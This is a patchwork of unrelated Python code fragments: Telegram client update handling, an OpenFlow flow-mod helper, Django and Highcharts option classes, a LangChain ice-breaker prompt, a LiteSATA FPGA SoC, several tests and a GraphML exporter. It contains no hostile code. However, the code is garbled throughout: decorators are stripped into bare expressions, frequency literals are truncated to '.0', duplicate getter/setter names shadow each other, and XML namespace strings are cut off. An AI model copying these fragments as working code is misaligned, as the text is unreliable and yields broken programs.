            (await self.cache.set(cache_id, ((offset_id, offset_date, offset_peer), (cache + dialogs)), ttl=120))
            for dialog in dialogs:
                (yield dialog)
                current += 1
                if (current >= total):
                    return

    async def catch_reply(self, chat_id: Union[(int, str)], outgoing=False):
        """Context manager yielding a Future resolved by the next message
        in *chat_id* (incoming only, unless *outgoing* is set).

        NOTE(review): this is used via `async with` in wait_reply below, so
        it was presumably decorated with @asynccontextmanager — the
        decorator appears stripped in this copy.
        """
        async def handler_func(client, message, future: asyncio.Future):
            future.set_result(message)
        future = asyncio.Future()
        # NOTE: 'filter' shadows the builtin; kept as-is.
        filter = filters.chat(chat_id)
        if (not outgoing):
            filter = (filter & (~ filters.outgoing))
        handler = MessageHandler(async_partial(handler_func, future=future), filter)
        (await self.add_handler(handler, group=0))
        try:
            (yield future)
        finally:
            # Always unhook the temporary handler.
            self.remove_handler(handler, group=0)

    async def wait_reply(self, chat_id: Union[(int, str)], send: str=None, timeout: float=10, outgoing=False):
        """Optionally send *send* to *chat_id*, then wait (up to *timeout*
        seconds) for the next reply and return it."""
        async with self.catch_reply(chat_id=chat_id, outgoing=outgoing) as f:
            if send:
                (await self.send_message(chat_id, send))
            msg: types.Message = (await asyncio.wait_for(f, timeout))
            return msg

    async def mute_chat(self, chat_id: Union[(int, str)], until: Union[(int, datetime)]):
        """Mute notifications for *chat_id* until the given time (datetime
        or unix timestamp)."""
        if isinstance(until, datetime):
            until = until.timestamp()
        return (await self.invoke(raw.functions.account.UpdateNotifySettings(peer=raw.types.InputNotifyPeer(peer=(await self.resolve_peer(chat_id))), settings=raw.types.InputPeerNotifySettings(show_previews=False, mute_until=int(until)))))

    async def handle_updates(self, updates):
        """Dispatch raw updates to the custom dispatcher queue, repairing
        "min" user/chat entities for channel messages via
        GetChannelDifference when necessary."""
        self.last_update_time = datetime.now()
        if isinstance(updates, (raw.types.Updates, raw.types.UpdatesCombined)):
            # fetch_peers returns whether any peer was a "min" entity.
            is_min = any(((await self.fetch_peers(updates.users)), (await self.fetch_peers(updates.chats))))
            users = {u.id: u for u in updates.users}
            chats = {c.id: c for c in updates.chats}
            for update in updates.updates:
                channel_id = (getattr(getattr(getattr(update, 'message', None), 'peer_id', None), 'channel_id', None) or getattr(update, 'channel_id', None))
                pts = getattr(update, 'pts', None)
                pts_count = getattr(update, 'pts_count', None)
                if (isinstance(update, raw.types.UpdateNewChannelMessage) and is_min):
                    message = update.message
                    if (not isinstance(message, raw.types.MessageEmpty)):
                        try:
                            # Fetch the full entities for just this message.
                            diff = (await self.invoke(raw.functions.updates.GetChannelDifference(channel=(await self.resolve_peer(utils.get_channel_id(channel_id))), filter=raw.types.ChannelMessagesFilter(ranges=[raw.types.MessageRange(min_id=update.message.id, max_id=update.message.id)]), pts=(pts - pts_count), limit=pts)))
                        except ChannelPrivate:
                            pass
                        except OSError:
                            # NOTE(review): log text appears stripped here.
                            logger.info(', .')
                        else:
                            if (not isinstance(diff, raw.types.updates.ChannelDifferenceEmpty)):
                                users.update({u.id: u for u in diff.users})
                                chats.update({c.id: c for c in diff.chats})
                self.dispatcher.updates_queue.put_nowait((update, users, chats))
        elif isinstance(updates, (raw.types.UpdateShortMessage, raw.types.UpdateShortChatMessage)):
            # Short updates carry no entities; fetch them via GetDifference.
            diff = (await self.invoke(raw.functions.updates.GetDifference(pts=(updates.pts - updates.pts_count), date=updates.date, qts=(- 1))))
            if diff.new_messages:
                self.dispatcher.updates_queue.put_nowait((raw.types.UpdateNewMessage(message=diff.new_messages[0], pts=updates.pts, pts_count=updates.pts_count), {u.id: u for u in diff.users}, {c.id: c for c in diff.chats}))
            elif diff.other_updates:
                self.dispatcher.updates_queue.put_nowait((diff.other_updates[0], {}, {}))
        elif isinstance(updates, raw.types.UpdateShort):
            self.dispatcher.updates_queue.put_nowait((updates.update, {}, {}))
        elif isinstance(updates, raw.types.UpdatesTooLong):
            logger.info(updates)
_cache()
def flowmod(cookie, command, table_id, priority, out_port, out_group, match_fields, inst, hard_timeout, idle_timeout, flags=0):
    """Assemble an OFPFlowMod message from the supplied header fields.

    The datapath is deliberately left as None; the caller attaches it (or
    serializes the message itself) later.
    """
    return parser.OFPFlowMod(
        datapath=None,
        cookie=cookie,
        command=command,
        table_id=table_id,
        priority=priority,
        out_port=out_port,
        out_group=out_group,
        match=match_fields,
        instructions=inst,
        hard_timeout=hard_timeout,
        idle_timeout=idle_timeout,
        flags=flags,
    )
class _DcBoundMixin(models.Model):
    """Abstract Django model mixin adding an optional binding to a Dc.

    NOTE(review): the dc_bound_bool getter/setter pair below is missing its
    @property / @dc_bound_bool.setter decorators in this copy of the file —
    the bare "_bound_bool.setter" line is the mangled remnant; restore them.
    """

    # NULL means "not bound to any datacenter"; SET_NULL keeps rows alive
    # when the referenced Dc row is deleted.
    dc_bound = models.ForeignKey('vms.Dc', related_name='%(class)s_dc_bound_set', null=True, blank=True, default=None, on_delete=models.SET_NULL)

    class Meta():
        app_label = 'vms'
        abstract = True

    def dc_bound_bool(self):
        # Boolean view of the FK: bound or not.
        return bool(self.dc_bound)

    _bound_bool.setter
    def dc_bound_bool(self, value):
        self.dc_bound = value
class DataEnum():
    """Base class for enumerated option values attached to a page component.

    Subclasses set *dflt* and *js_conversion* and expose zero-argument
    option methods that call set() with no value; the chosen value then
    defaults to the calling method's name (via the frame inspection below).
    """

    # Default value used when no value is supplied at construction.
    dflt = None
    # Whether set() should convert values to JavaScript expressions.
    js_conversion = False

    def __init__(self, component, value: Any=None):
        (self.page, self.__value) = (component.page, (value or self.dflt))
        self.component = component

    def set(self, value: Union[(str, primitives.JsDataModel)]=None):
        if (value is None):
            # Use the caller's function name as the value so subclasses can
            # expose each option as a zero-argument method.
            value = sys._getframe().f_back.f_code.co_name
        if self.js_conversion:
            # Convert to a JS expression string when requested.
            value = (value.toStr() if hasattr(value, 'toStr') else JsUtils.jsConvertData(value, None).toStr())
        self.__value = value

    def custom(self, value: str):
        # Store a raw value, bypassing any conversion.
        self.__value = value

    def __str__(self):
        return self.__value
def get_ice_breaker_chain() -> LLMChain:
    """Build the LLM chain that writes two creative ice breakers from a
    person's LinkedIn information and recent tweets.

    The output-format instructions are injected as a partial variable from
    the module-level ice_breaker_parser.
    """
    template_text = '\n given the information about a person from linkedin {information}, and twitter posts {twitter_posts} I want you to create:\n 2 creative Ice breakers with them that are derived from their activity on Linkedin and twitter, preferably on latest tweets\n \n{format_instructions}\n '
    prompt = PromptTemplate(
        input_variables=['information', 'twitter_posts'],
        template=template_text,
        partial_variables={'format_instructions': ice_breaker_parser.get_format_instructions()},
    )
    return LLMChain(llm=llm_creative, prompt=prompt)
def AutocompleteFilterFactory(title, base_parameter_name, viewname='', use_pk_exact=False, label_by=str):
    """Create an AutocompleteFilter subclass configured for one field.

    title: displayed filter title.
    base_parameter_name: field path, possibly traversing relations with
        LOOKUP_SEP ('__').
    viewname: optional named URL for a custom autocomplete endpoint.
    use_pk_exact: for direct (non-relation) fields, filter on
        '<field_pk>__exact'.
    label_by: callable or attribute name used to build choice labels.
    """
    class NewMetaFilter(type(AutocompleteFilter)):
        """Metaclass that injects the field/parameter names when the filter
        class is created (list_filter instantiates classes, so these must
        be class attributes)."""

        def __new__(cls, name, bases, attrs):
            super_new = super().__new__(cls, name, bases, attrs)
            super_new.use_pk_exact = use_pk_exact
            field_names = str(base_parameter_name).split(LOOKUP_SEP)
            # The last path segment is the actual field on the related model.
            super_new.field_name = field_names[(- 1)]
            super_new.parameter_name = base_parameter_name
            if ((len(field_names) <= 1) and super_new.use_pk_exact):
                # Direct field: match on the primary key exactly.
                super_new.parameter_name += '__{}__exact'.format(super_new.field_pk)
            return super_new

    class NewFilter(AutocompleteFilter, metaclass=NewMetaFilter):
        def __init__(self, request, params, model, model_admin):
            self.rel_model = _get_rel_model(model, base_parameter_name)
            self.form_field = generate_choice_field(label_by)
            super().__init__(request, params, model, model_admin)
            # Set after super().__init__ so it overrides the class default.
            self.title = title

        def get_autocomplete_url(self, request, model_admin):
            # Fall back to the admin default unless a view name was given.
            if (viewname == ''):
                return super().get_autocomplete_url(request, model_admin)
            else:
                return reverse(viewname)

    return NewFilter
class WallPlaneHolder(_WallMountedBox):
    """Wall-mounted holder for a (hand) plane: two side walls with finger
    holes joined by a front wall and three horizontal shelves/stops."""

    def __init__(self) -> None:
        super().__init__()
        # User-adjustable dimensions (all in mm).
        self.argparser.add_argument('--width', action='store', type=float, default=80, help='width of the plane')
        self.argparser.add_argument('--length', action='store', type=float, default=250, help='length of the plane')
        self.argparser.add_argument('--hold_length', action='store', type=float, default=30, help='length of the part holding the plane over the front')
        self.argparser.add_argument('--height', action='store', type=float, default=80, help='height of the front of plane')

    def side(self):
        """Callback drawing the finger holes on a side wall: two vertical
        rows for the back shelves, one for the front hold, and one
        horizontal row for the front wall."""
        (l, w, h) = (self.length, self.width, self.height)
        hl = self.hold_length
        t = self.thickness
        # Two quarter-length vertical shelf slots at the back edge.
        self.fingerHolesAt((1.5 * t), (2 * t), (0.25 * l), 90)
        self.fingerHolesAt((1.5 * t), ((2 * t) + (0.75 * l)), (0.25 * l), 90)
        # Short vertical slot for the front hold piece.
        self.fingerHolesAt(((2.5 * t) + h), (((2 * t) + l) - hl), hl, 90)
        # Horizontal slot for the front wall.
        self.fingerHolesAt((2 * t), (1.5 * t), (h + (2 * t)), 0)

    def render(self):
        self.generateWallEdges()
        (l, w, h) = (self.length, self.width, self.height)
        t = self.thickness
        # Two identical side walls carrying the finger holes.
        self.rectangularWall((h + (4 * t)), (l + (2 * t)), 'eeea', callback=[self.side], move='right')
        self.rectangularWall((h + (4 * t)), (l + (2 * t)), 'eeea', callback=[self.side], move='right')
        # Front wall plus the three cross pieces matching the side slots.
        self.rectangularWall(w, (h + (2 * t)), 'efFf', move='up')
        self.rectangularWall(w, (0.25 * l), 'ffef', move='up')
        self.rectangularWall(w, (0.25 * l), 'efef', move='up')
        self.rectangularWall(w, self.hold_length, 'efef', move='up')
class SATATestSoC(SoCMini):
    """LiteSATA bench SoC (KC705): SATA PHY/core/crossbar plus a BIST and
    sector<->memory DMA masters, with optional LiteScope analyzers.

    NOTE(review): several numeric literals in this copy of the source are
    truncated to ".0" (the sys/SATA clock frequencies, the refclk rate and
    the period-constraint numerators, presumably values like 200e6/150e6
    and 1e9) — restore them from the original before building.
    """

    def __init__(self, platform, connector='fmc', gen='gen3', with_global_analyzer=False, with_sector2mem_analyzer=False, with_mem2sector_analyzer=False):
        assert (connector in ['fmc', 'sfp', 'pcie'])
        assert (gen in ['gen1', 'gen2', 'gen3'])
        sys_clk_freq = int(.0)
        sata_clk_freq = {'gen1': .0, 'gen2': .0, 'gen3': .0}[gen]
        # Clock/reset generation and minimal SoC with a UART bridge.
        self.submodules.crg = _CRG(platform, sys_clk_freq)
        SoCMini.__init__(self, platform, sys_clk_freq, ident='LiteSATA bench on KC705')
        self.add_uartbone()
        # SATA reference clock: generated on-chip for sfp/pcie connectors,
        # taken from the FMC module otherwise.
        sata_refclk = None
        if (connector != 'fmc'):
            self.clock_domains.cd_sata_refclk = ClockDomain()
            self.crg.pll.create_clkout(self.cd_sata_refclk, .0)
            sata_refclk = ClockSignal('sata_refclk')
            platform.add_platform_command('set_property SEVERITY {{Warning}} [get_drc_checks REQP-52]')
        # SATA stack: PHY -> core -> crossbar -> BIST.
        self.submodules.sata_phy = LiteSATAPHY(platform.device, refclk=sata_refclk, pads=platform.request((connector + '2sata')), gen=gen, clk_freq=sys_clk_freq, data_width=16)
        self.submodules.sata_core = LiteSATACore(self.sata_phy)
        self.submodules.sata_crossbar = LiteSATACrossbar(self.sata_core)
        self.submodules.sata_bist = LiteSATABIST(self.sata_crossbar, with_csr=True)
        # DMA masters: sector->memory and memory->sector over Wishbone.
        bus = wishbone.Interface(data_width=32, adr_width=32)
        self.submodules.sata_sector2mem = LiteSATASector2MemDMA(self.sata_crossbar.get_port(), bus)
        self.bus.add_master('sata_sector2mem', master=bus)
        bus = wishbone.Interface(data_width=32, adr_width=32)
        self.submodules.sata_mem2sector = LiteSATAMem2SectorDMA(bus, self.sata_crossbar.get_port())
        self.bus.add_master('sata_mem2sector', master=bus)
        # Timing constraints between the system and SATA clock domains.
        platform.add_period_constraint(self.sata_phy.crg.cd_sata_tx.clk, (.0 / sata_clk_freq))
        platform.add_period_constraint(self.sata_phy.crg.cd_sata_rx.clk, (.0 / sata_clk_freq))
        self.platform.add_false_path_constraints(self.crg.cd_sys.clk, self.sata_phy.crg.cd_sata_tx.clk, self.sata_phy.crg.cd_sata_rx.clk)
        # Status LEDs: heartbeat counters per clock domain + PHY ready.
        sys_counter = Signal(32)
        self.sync.sys += sys_counter.eq((sys_counter + 1))
        self.comb += platform.request('user_led', 0).eq(sys_counter[26])
        tx_counter = Signal(32)
        self.sync.sata_tx += tx_counter.eq((tx_counter + 1))
        self.comb += platform.request('user_led', 1).eq(tx_counter[26])
        rx_counter = Signal(32)
        self.sync.sata_rx += rx_counter.eq((rx_counter + 1))
        self.comb += platform.request('user_led', 2).eq(rx_counter[26])
        self.comb += platform.request('user_led', 3).eq(self.sata_phy.ctrl.ready)
        # Optional LiteScope analyzers over the PHY/core or the DMA paths.
        if with_global_analyzer:
            analyzer_signals = [self.sata_phy.phy.tx_init.fsm, self.sata_phy.phy.rx_init.fsm, self.sata_phy.ctrl.fsm, self.sata_phy.ctrl.ready, self.sata_phy.source, self.sata_phy.sink, self.sata_core.command.sink, self.sata_core.command.source, self.sata_core.link.rx.fsm, self.sata_core.link.tx.fsm, self.sata_core.transport.rx.fsm, self.sata_core.transport.tx.fsm, self.sata_core.command.rx.fsm, self.sata_core.command.tx.fsm]
            self.submodules.global_analyzer = LiteScopeAnalyzer(analyzer_signals, 512, csr_csv='global_analyzer.csv')
        if with_sector2mem_analyzer:
            analyzer_signals = [self.sata_sector2mem.start.re, self.sata_sector2mem.fsm, self.sata_sector2mem.port.sink, self.sata_sector2mem.port.source, self.sata_sector2mem.bus]
            self.submodules.sector2mem_analyzer = LiteScopeAnalyzer(analyzer_signals, 2048, csr_csv='sector2mem_analyzer.csv')
        if with_mem2sector_analyzer:
            analyzer_signals = [self.sata_mem2sector.start.re, self.sata_mem2sector.fsm, self.sata_mem2sector.port.sink, self.sata_mem2sector.port.source, self.sata_mem2sector.bus]
            self.submodules.mem2sector_analyzer = LiteScopeAnalyzer(analyzer_signals, 2048, csr_csv='mem2sector_analyzer.csv')
class QuantilesTracker():
    """Accumulates scalar samples and reports empirical quantiles.

    Samples are kept verbatim; quantiles are computed on demand with
    numpy's (linearly interpolated) quantile.  With no samples recorded
    every quantile is +infinity.
    """

    def __init__(self):
        # Raw observations, in insertion order.
        self._samples: List = []

    def update(self, val: float) -> None:
        """Record a single observation."""
        self._samples.append(val)

    def quantile(self, p) -> float:
        """Return the p-th quantile of all recorded samples.

        Returns +inf when nothing has been recorded yet.
        """
        if not self._samples:
            return float('Inf')
        return np.quantile(self._samples, p)

    def median_val(self) -> float:
        """The 50th percentile."""
        return self.quantile(0.5)

    def lower_quartile_val(self) -> float:
        """The 25th percentile."""
        return self.quantile(0.25)

    def upper_quartile_val(self) -> float:
        """The 75th percentile."""
        return self.quantile(0.75)
class TestShellHook(fake_filesystem_unittest.TestCase):
    """Tests for ShellHook against a fake filesystem.

    NOTE(review): the bare "('subprocess.check_call')" expressions before
    three tests below are the remnants of stripped decorator lines
    (presumably "@mock.patch('subprocess.check_call')") — each decorated
    test receives the mock as its *check_call* argument; restore the
    decorators before running.
    """

    def setUp(self):
        self.setUpPyfakefs()
        # Remember the real cwd so tearDown can restore it after cd tests.
        self.original_dir = os.getcwd()
        self.hook = ShellHook()
        self.fs.create_dir(FAKEDIR)

    def tearDown(self):
        os.chdir(self.original_dir)

    def test_cd_pre(self):
        # 'cd' in a before-hook changes the working directory.
        self.assertNotEqual(FAKEDIR, os.getcwd())
        self.assertEqual(self.original_dir, os.getcwd())
        self.hook.before({'before': ['cd {}'.format(FAKEDIR)]})
        self.assertEqual(FAKEDIR, os.getcwd())

    def test_cd_pre_reset(self):
        # The after-hook restores the original working directory.
        self.assertNotEqual(FAKEDIR, os.getcwd())
        self.assertEqual(self.original_dir, os.getcwd())
        self.hook.before({'before': ['cd {}'.format(FAKEDIR)]})
        self.assertEqual(FAKEDIR, os.getcwd())
        self.hook.after({'before': ['cd {}'.format(FAKEDIR)]})
        self.assertEqual(self.original_dir, os.getcwd())

    ('subprocess.check_call')
    def test_pre_subprocess(self, check_call):
        # Non-cd before-commands are run through subprocess with output
        # suppressed.
        self.hook.before({'before': ['echo "hello world" extra']})
        check_call.assert_called_once_with('echo "hello world" extra', shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

    ('subprocess.check_call')
    def test_post_subprocess(self, check_call):
        # Same for after-commands.
        self.hook.after({'after': ['echo "hello world" extra']})
        check_call.assert_called_once_with('echo "hello world" extra', shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

    ('subprocess.check_call')
    def test_subprocess_fail(self, check_call):
        # A failing command propagates CalledProcessError.
        with self.assertRaises(subprocess.CalledProcessError):
            check_call.side_effect = subprocess.CalledProcessError(1, '')
            self.hook.before({'before': ['true']})
def test_graph_with_switch_empty_nodes2(task):
    """Restructuring a CFG whose switch has empty case blocks: empty nodes
    that merge into a shared successor become fall-through cases, and
    fully-empty cases are dropped or kept as empty code nodes."""
    # CFG: block 0 switches on 'a' into five cases; blocks 3 and 4 are
    # empty and both fall into block 5; everything converges on block 7.
    task.graph.add_nodes_from((vertices := [BasicBlock(0, instructions=[IndirectBranch(variable('a'))]), BasicBlock(1, instructions=[Assignment(variable('a'), Constant(2))]), BasicBlock(2, instructions=[]), BasicBlock(3, instructions=[]), BasicBlock(4, instructions=[]), BasicBlock(5, instructions=[Assignment(variable('a'), Constant(3))]), BasicBlock(6, instructions=[Assignment(variable('a'), Constant(10))]), BasicBlock(7, instructions=[])]))
    task.graph.add_edges_from([SwitchCase(vertices[0], vertices[1], cases=[Constant(1)]), SwitchCase(vertices[0], vertices[2], cases=[Constant(2)]), SwitchCase(vertices[0], vertices[3], cases=[Constant(3)]), SwitchCase(vertices[0], vertices[4], cases=[Constant(4)]), SwitchCase(vertices[0], vertices[6], cases=[Constant(5)]), UnconditionalEdge(vertices[3], vertices[5]), UnconditionalEdge(vertices[4], vertices[5]), UnconditionalEdge(vertices[1], vertices[7]), UnconditionalEdge(vertices[2], vertices[7]), UnconditionalEdge(vertices[5], vertices[7]), UnconditionalEdge(vertices[6], vertices[7])])
    PatternIndependentRestructuring().run(task)
    # Expect a 4-case switch on 'a' at the AST root.
    assert (isinstance((switch_node := task._ast.root), SwitchNode) and (len(switch_node.children) == 4))
    assert (switch_node.expression == variable('a'))
    # Case 3 falls through (break_case False) into case 4's body.
    assert (isinstance((case1 := switch_node.children[0]), CaseNode) and (case1.constant == Constant(1)) and (case1.break_case is True))
    assert (isinstance((case2 := switch_node.children[1]), CaseNode) and (case2.constant == Constant(3)) and (case2.break_case is False))
    assert (isinstance((case3 := switch_node.children[2]), CaseNode) and (case3.constant == Constant(4)) and (case3.break_case is True))
    assert (isinstance((case4 := switch_node.children[3]), CaseNode) and (case4.constant == Constant(5)) and (case4.break_case is True))
    # Case bodies map back to the original basic-block instructions.
    assert (isinstance((code_node_1 := case1.child), CodeNode) and (code_node_1.instructions == vertices[1].instructions))
    assert case2.child.is_empty_code_node
    assert (isinstance((code_node_3 := case3.child), CodeNode) and (code_node_3.instructions == vertices[5].instructions))
    assert (isinstance((code_node_4 := case4.child), CodeNode) and (code_node_4.instructions == vertices[6].instructions))
def to_prometheus_format(metrics: typing.Dict[(str, str)], prom_stati: typing.Sequence[typing.Tuple[(str, typing.Mapping[(str, typing.Union[(int, float, None)])])]]) -> typing.List[str]:
    """Render gauge metrics as Prometheus exposition-format lines.

    metrics maps metric name -> help text; prom_stati pairs a rendered
    label string with a mapping of metric name -> value.  Each metric gets
    a HELP/TYPE preamble followed by one sample line per label set.
    """
    lines: typing.List[str] = []
    for metric_name, metric_desc in metrics.items():
        lines.append(f'# HELP {metric_name} {metric_desc}.')
        lines.append(f'# TYPE {metric_name} gauge')
        for label_str, values in prom_stati:
            # Sample line: name{labels} value
            lines.append(f'{metric_name}{{{label_str}}} {values[metric_name]}')
    return lines
def test_fastq_scores_mean():
    """The per-position mean phred quality of the bundled FASTQ fixture
    matches the precomputed expected profile."""
    filename = 'tests/data/test.fastq'
    # Expected mean phred score per read position (length == read_length
    # after trimming to the longest read in the file).
    expected_scores = [29, 30, 33, 33, 32, 36, 36, 36, 32, 36, 36, 37, 38, 38, 38, 38, 38, 37, 37, 38, 38, 38, 39, 38, 38, 39, 39, 38, 39, 38, 38, 38, 39, 39, 39, 39, 38, 39, 37, 38, 39, 38, 38, 39, 39, 38, 38, 39, 37, 38, 38, 34, 34, 38, 38, 33, 38, 37, 38, 38, 38, 38, 38, 34, 38, 38, 38, 38, 34, 38, 38, 37, 38, 38, 37, 38, 37, 28, 37, 38, 38, 38, 39, 38, 39, 39, 38, 39, 38, 34, 38, 39, 39, 38, 37, 38, 37, 38, 38, 38, 38, 39, 39, 38, 38, 33, 37, 36, 38, 38, 38, 38, 38, 37, 38, 36, 38, 34, 38, 38, 38, 38, 38, 38, 38, 38, 38, 37, 39, 36, 38, 39, 38, 39, 38, 39, 38, 38, 36, 36, 36, 36, 37, 36, 37, 38, 37, 32, 36, 35, 37, 36, 36, 36, 37, 37, 37, 38, 38, 38, 38, 38, 32, 35, 36, 36, 38, 35, 31, 32, 35, 34, 37, 37, 31, 33, 36, 36, 35, 30, 35, 37, 36, 36, 36, 36, 32, 34, 32, 36, 37, 37, 31, 37, 34, 34, 35, 32, 36, 36, 36, 31, 30, 36, 34, 37, 36, 32, 37, 36, 31, 33, 33, 36, 29, 34, 30, 31, 36, 36, 36, 37, 35, 31, 33, 25, 24, 31, 34, 30, 36, 37, 36, 31, 31, 33, 33, 36, 37, 36, 37, 30, 30, 35, 25, 28, 25, 29, 34, 25, 18]
    read_length = 500  # maximum read length considered
    min_length = 0     # no minimum-length filtering
    stats = fastqe.fastqe.FastqStats().from_file(filename, read_length, min_length)
    calculated_scores = stats.quality_scores_mean.letter_annotations['phred_quality']
    assert (calculated_scores == expected_scores)
class OptionPlotoptionsColumnrangeSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
    """Tremolo-speed mapping options for columnrange sonification
    (Highcharts wrapper).

    NOTE(review): each option appears twice as a getter/setter pair with
    the same name; the @property / @<name>.setter decorators were evidently
    stripped from this copy — restore them, otherwise the later definition
    shadows the earlier one.
    """

    def mapFunction(self):
        # Getter: configured mapping function (None when unset).
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: mapping function for the tremolo speed.
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter: data property the tremolo speed is mapped to.
        return self._config_get(None)

    def mapTo(self, text: str):
        # Setter: data property name to map to.
        self._config(text, js_type=False)

    def max(self):
        # Getter: maximum mapped value.
        return self._config_get(None)

    def max(self, num: float):
        # Setter: maximum mapped value.
        self._config(num, js_type=False)

    def min(self):
        # Getter: minimum mapped value.
        return self._config_get(None)

    def min(self, num: float):
        # Setter: minimum mapped value.
        self._config(num, js_type=False)

    def within(self):
        # Getter: scope the mapping is computed within.
        return self._config_get(None)

    def within(self, value: Any):
        # Setter: scope the mapping is computed within.
        self._config(value, js_type=False)
class OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpass(Options):
    """Low-pass filter mapping options for streamgraph sonification
    (Highcharts wrapper).  Each accessor returns a lazily-created
    sub-configuration object.

    NOTE(review): these look like @property accessors with the decorators
    stripped from this copy of the source — confirm and restore.
    """

    def frequency(self) -> 'OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpassFrequency':
        # Sub-config: low-pass cutoff frequency mapping.
        return self._config_sub_data('frequency', OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpassFrequency)

    def resonance(self) -> 'OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpassResonance':
        # Sub-config: low-pass resonance mapping.
        return self._config_sub_data('resonance', OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpassResonance)
class FauxPilotException(Exception):
    """API error carrying OpenAI-style error metadata.

    The message is also passed to Exception so str(exc) works; json()
    renders the error as an OpenAI-compatible response payload.
    """

    def __init__(self, message: str, error_type: Optional[str]=None, param: Optional[str]=None, code: Optional[int]=None):
        super().__init__(message)
        self.message = message
        self.error_type = error_type
        self.param = param
        self.code = code

    def json(self):
        """Return the error as an OpenAI-style 'error' payload dict."""
        return {
            'error': {
                'message': self.message,
                'type': self.error_type,
                'param': self.param,
                'code': self.code,
            }
        }
class IApplicationWindow(IWindow):
    """Interface for a top-level application window carrying an icon, a
    menu bar, a status bar and tool bars (pyface-style Traits interface).

    NOTE(review): the method bodies below were empty in this copy of the
    source (docstrings evidently stripped); docstring bodies are restored
    so the class is syntactically valid.
    """

    # The window icon displayed by the toolkit.
    icon = Image()
    # Managers for the window's chrome; tool_bar_managers allows several
    # independent tool bars.
    menu_bar_manager = Instance(IMenuBarManager)
    status_bar_manager = Instance(IStatusBarManager)
    tool_bar_managers = List(Instance(IToolBarManager))

    def _create_contents(self, parent):
        """Create and return the window's content widget."""

    def _create_menu_bar(self, parent):
        """Create the menu bar, if a menu bar manager is set."""

    def _create_status_bar(self, parent):
        """Create the status bar, if a status bar manager is set."""

    def _create_tool_bar(self, parent):
        """Create the tool bar(s), if tool bar managers are set."""

    def _create_trim_widgets(self, parent):
        """Create the window 'trim' (menu/status/tool bars, icon)."""

    def _set_window_icon(self):
        """Apply the icon trait to the toolkit window."""
def detect_and_insert_sdk_include_and_library_dirs(include_dirs, library_dirs) -> None:
    """Prepend auto-detected kinect SDK paths to the given directory lists.

    Detection only runs on win32; on other platforms (and on detection
    failure) a message is printed and the lists are left untouched.
    Both lists are mutated in place; nothing is returned.
    """
    detected = detect_win32_sdk_include_and_library_dirs() if sys.platform == 'win32' else None
    if detected is None:
        print('Automatic kinect SDK detection did not yield any results.')
        return
    include_dir, library_dir = detected
    print(f'Automatically detected kinect SDK. Adding include dir: {include_dir} and library dir {library_dir}.')
    # Prepend so the detected SDK wins over any pre-existing entries.
    include_dirs.insert(0, include_dir)
    library_dirs.insert(0, library_dir)
class GraphML():
    """Converts an ExecutionTrace into a GraphML document.

    A graph node is created for every trace op and every tensor; edges link
    parent ops to children, input tensors to the ops that read them, and ops
    to the tensors they produce.
    """

    def __init__(self, execution_trace: ExecutionTrace):
        self.nodes: List = []
        self.edges: List = []
        # One graph node per trace op, labelled "name (id)".
        for (id, n) in execution_trace.nodes.items():
            self._create_node(id, f'{n.name} ({n.id})', n.name)
        # One graph node per tensor.
        for tensor in execution_trace.tensors.values():
            self._create_tensor_node(tensor)
        # Structural edges (parent -> child) and data edges
        # (input tensor -> op, op -> output tensor).
        for (id, n) in execution_trace.nodes.items():
            self._create_edge(n.parent_id, id)
            for (_, input, _) in n.get_input_tensors():
                self._create_edge(input, id)
            for (_, output, _) in n.get_output_tensors():
                self._create_edge(id, output)
        logging.info(f'nodes: {len(self.nodes)}')
        logging.info(f'edges: {len(self.edges)}')

    def _create_node(self, node_id: int, name: str='', type: str='', input: str='', output: str='', arg: str='', device: str='', engine: str='', is_grad: str='', info: str=''):
        """Append a node record; empty attribute values are skipped when writing."""
        self.nodes.append({'id': node_id, 'name': name, 'type': type, 'input': input, 'output': output, 'arg': arg, 'is_grad': is_grad, 'device': device, 'engine': engine, 'info': info})

    def _create_tensor_node(self, tensor):
        """Append a node record for a tensor, labelled "T<id>"."""
        self._create_node(tensor.id, f'T{tensor.id}', type='Tensor', input=tensor.sources, output=tensor.sinks)

    def _create_edge(self, source, target):
        """Append a directed edge record from *source* to *target*."""
        self.edges.append({'source': source, 'target': target})

    def write(self, name, file_name):
        """Write the collected nodes and edges as a GraphML file to *file_name*."""
        def write_header():
            out.write('<?xml version="1.0" encoding="UTF-8"?>\n')
        def graphml_begin():
            # NOTE(review): the xmlns / xsi:schemaLocation URLs and the opening
            # of the first <key> element appear truncated in this literal —
            # verify the emitted header against a valid GraphML schema.
            graphml = '<graphml xmlns=" xmlns:xsi=" xsi:schemaLocation=" id="name" attr.name="name" attr.type="string" for="node" namespace="all::node"/>\n<key id="type" attr.name="type" attr.type="string" for="node" namespace="all::node"/>\n<key id="input" attr.name="input" attr.type="string" for="node" namespace="all::node"/>\n<key id="output" attr.name="output" attr.type="string" for="node" namespace="all::node"/>\n<key id="arg" attr.name="arg" attr.type="string" for="node" namespace="all::node"/>\n<key id="device" attr.name="device" attr.type="string" for="node" namespace="all::node"/>\n<key id="engine" attr.name="engine" attr.type="string" for="node" namespace="all::node"/>\n<key id="is_grad" attr.name="is_grad" attr.type="string" for="node" namespace="all::node"/>\n<key id="info" attr.name="info" attr.type="string" for="node" namespace="all::node"/>\n'
            out.write(graphml)
        def graphml_end():
            out.write('</graphml>\n')
        def write_graph():
            out.write(f'''<graph id="{name}" edgedefault="directed">
''')
            for node in self.nodes:
                write_node(node)
            for (id, edge) in enumerate(self.edges):
                write_edge(id, edge['source'], edge['target'])
            out.write('</graph>\n')
        def write_node(node):
            out.write(f'''<node id="{node['id']}">
''')
            for (name, data) in node.items():
                # Skip the id key and any empty attribute values.
                if ((name != 'id') and data):
                    out.write(f''' <data key="{name}">{data}</data>
''')
            out.write('</node>\n')
        def write_edge(id, source, target):
            out.write(f'''<edge id="e_{id}" source="{source}" target="{target}"/>
''')
        with open(file_name, 'wt') as out:
            write_header()
            graphml_begin()
            write_graph()
            graphml_end()
class AffiliationAddressTeiTrainingDataGenerator(AbstractTeiTrainingDataGenerator):
